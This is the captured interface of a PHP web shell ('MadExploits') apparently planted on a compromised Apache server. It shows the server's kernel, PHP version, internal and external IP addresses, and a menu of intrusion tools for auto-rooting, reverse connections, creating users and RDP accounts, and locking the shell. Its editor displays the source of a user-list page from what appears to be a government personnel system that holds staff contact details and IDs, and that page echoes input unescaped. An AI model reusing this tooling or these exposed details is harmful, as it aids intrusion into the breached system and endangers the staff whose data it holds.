Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 18.218.99.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
eedpims /
userinfo /
[ HOME SHELL ]
Name
Size
Permission
Action
ajaxview.php
520
B
-rw-r--r--
userinfo.php
6.11
KB
-rw-r--r--
userinfo_editor.php
7.45
KB
-rw-r--r--
userinfo_list.php
8.37
KB
-rw-r--r--
userinfo_pending.php
8.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : userinfo_list.php
<?php include("../homepage/header.php"); include("../homepage/headermenu.php"); if(empty($_SESSION["username"])) { Header("Location: ../login/login.php"); } ?> <div class="container fullheight"> <div class="row"> <div class="col-md-6 col-md-offset-4"> <br/> <form name="search_frm" id="search_frm" class="form-inline"> <label>Search Key</label> <input type="text" name="field_value" id="field_value" value="<?=$_SESSION["field_value"]?>" class="form-control"> <input type="hidden" name="cmd" id="cmd" value="search_userinfo" > <input type="submit" class="btn btn-primary" value="Search"> </form> </div> </div> <div class="row"> <div class="col-md-12"> <a style="text-decoration: none" href="userinfo.php?cmd=edit">নতুন তথ্য যোগ করুন</a></font> <div style="background-color: #ff0000;height: 2px"> </div> <br/> <table class="table table-bordered table-striped table-condensed"> <thead> <th>ক্রম</th> <th>ব্যক্তিগত ই-মেইল</th> <th>ব্যবহারকারীর নাম</th> <th>পদবি</th> <th>মোবাইল নং</th> <th>অধিদপ্তর/প্রতিষ্ঠান</th> <th>রোল</th> <th>PMIS আইডি</th> <th>অনুমোদন আছে?</th> <th style="text-align: center">সংশোধন</th> <th style="text-align: center">ডিলিট</th> <!-- <th style="text-align: center">ভিউ</th> --> </thead> <tbody> <?php if($_SESSION["search"]=="yes") { $val= $_SESSION["field_value"]; $whrstr = "%$val%"; } else { $whrstr = "%%"; } $rowsPerPage = 50; $pageNum = 1; if(isset($_REQUEST["page"])) { $pageNum = $_REQUEST["page"]; } $offset = ($pageNum - 1) * $rowsPerPage; // prepare and bind $stmt = $conn->prepare("SELECT u.id, u.uname, u.username, u.designation, u.office_id, u.upassword, u.userrole_id, u.dumpass, u.aprflag, u.mobileno, u.districtoffice_id, g.GovtId,offi.OfficeName,doff.districtofficeName, ur.rolename FROM userinfo u LEFT JOIN `general` g ON(u.id=g.userinfo_id) LEFT JOIN `office` offi ON(u.office_id=offi.id) LEFT JOIN `districtoffice` doff ON(u.districtoffice_id=doff.id) LEFT JOIN `userrole` ur ON(u.userrole_id=ur.id) WHERE 1=1 and (u.uname LIKE ? or g.GovtId LIKE ? OR u.mobileno LIKE ? ) ORDER BY u.id DESC LIMIT ?, ?"); $stmt->bind_param("sssii",$whrstr,$whrstr,$whrstr,$offset,$rowsPerPage); $stmt->execute(); //Result $result = $stmt->get_result(); $numrows=$result->num_rows; if($numrows==0) exit('No rows'); $slno=$offset; while($row = $result->fetch_assoc()) { $slno = $slno+1; $id = $row["id"]; $OfficeName = $row["OfficeName"]; $uname = $row["uname"]; $username = $row["username"]; $rolename = $row["rolename"]; $designation = $row["designation"]; $aprflag = $row["aprflag"]; $mobileno = $row["mobileno"]; $GovtId = $row["GovtId"]; ?> <tr> <td align="center"><?=bangladate($slno) ?></td> <td><?=$uname ?></td> <td><?=$username ?></td> <td><?=$designation ?></td> <td><?=$mobileno ?></td> <td><?=$OfficeName ?></td> <td><?=$rolename ?></td> <td><?=$GovtId ?></td> <td align="center"> <?php if($aprflag==0) { ?> <a href="userinfo.php?cmd=approve&id=<?=base64_encode($id)?>"><span class="glyphicon glyphicon-remove" onClick=" return confirm('অনুমোদন দেওয়া হলো?');"></span></a>; <?php } else echo '<a><span class="glyphicon glyphicon-ok"></span></a>'; ?> </td> <td align="center"> <a href="userinfo.php?cmd=edit&id=<?=base64_encode($id)?>"> <span class="glyphicon glyphicon-pencil"></span></a> </td> <td align="center"> <a href="userinfo.php?cmd=delete&id=<?=$id?>" onClick=" return confirm('আপনি কি নিশ্চিত?');"> <span class="glyphicon glyphicon-trash"></span></a> </td> <!-- <td align="center"> <a href="#" data-toggle="modal" data-target="#myModal"> <span class="glyphicon glyphicon-eye-open"></span></a> </td> --> </tr> <?php } ?> </tbody> <thead> <th> </th> <th> </th> <th> </th> <th> </th> <th> </th> <th> </th> <th> </th> <th> </th> <th> </th> <th> </th> <th style="text-align: center"> </th> </thead> </table> <div align="center"> <?php // prepare and bind $stmt = $conn->prepare("SELECT * FROM userinfo WHERE uname LIKE ? ORDER BY id ASC"); $stmt->bind_param("s",$whrstr); $stmt->execute(); //Result $result = $stmt->get_result(); $numrows=$result->num_rows; if($numrows==0) exit('No rows'); $maxPage = ceil($numrows/$rowsPerPage); $self = "userinfo.php?cmd=list"; $nav = ""; $start = ceil($pageNum/5)*5-5+1; $end = ceil($pageNum/5)*5; if($maxPage<$end) { $end = $maxPage; } for($page = $start; $page <= $end; $page++) { if ($page == $pageNum) { $nav .= "<span class=\"page-link\"><font color=\"red\">$page</font></span>"; } else { $nav .= " <a href=\"$self&&page=$page\" class=\"page-link\">$page</a> "; } } if ($pageNum > 1) { $page = $pageNum - 1; $prev = " <a href=\"$self&&page=$page\" class=\"page-link\">Prev</a> "; $first = " <a href=\"$self&&page=1\" class=\"page-link\">First Page</a> "; } else { $prev = " "; $first = " "; } if ($pageNum < $maxPage) { $page = $pageNum + 1; $next = " <a href=\"$self&&page=$page\" class=\"page-link\">Next</a> "; $last = " <a href=\"$self&&page=$maxPage\" class=\"page-link\">Last Page</a> "; } else { $next = " "; $last = " "; } if($numrows>1) { echo '<nav> <ul class="pagination"> <li class="page-item">'.$first.'</li>'. '<li class="page-item">'.$prev.'</li> <li class="page-item">'.$nav .'</li> <li class="page-item">'.$next.'</li> <li class="page-item">'. $last.'</li> </ul></nav>'; } ?> </div> </div> </div> </div> <?php include("../homepage/footer.php"); ?> <script> $( "select[name='districtoffice_id']" ).change(function () { var districtoffice_id = $(this).val(); if(districtoffice_id) { $.ajax({ url: "ajaxoffice.php", dataType: 'Json', data: {'districtoffice_id':districtoffice_id}, success: function(data) { $('select[name="office_id"]').empty(); $.each(data, function(key, value) { $('select[name="office_id"]').append('<option value="'+ key +'">'+ value +'</option>'); }); } }); }else{ $('select[name="office_id"]').empty(); } }); </script>
Close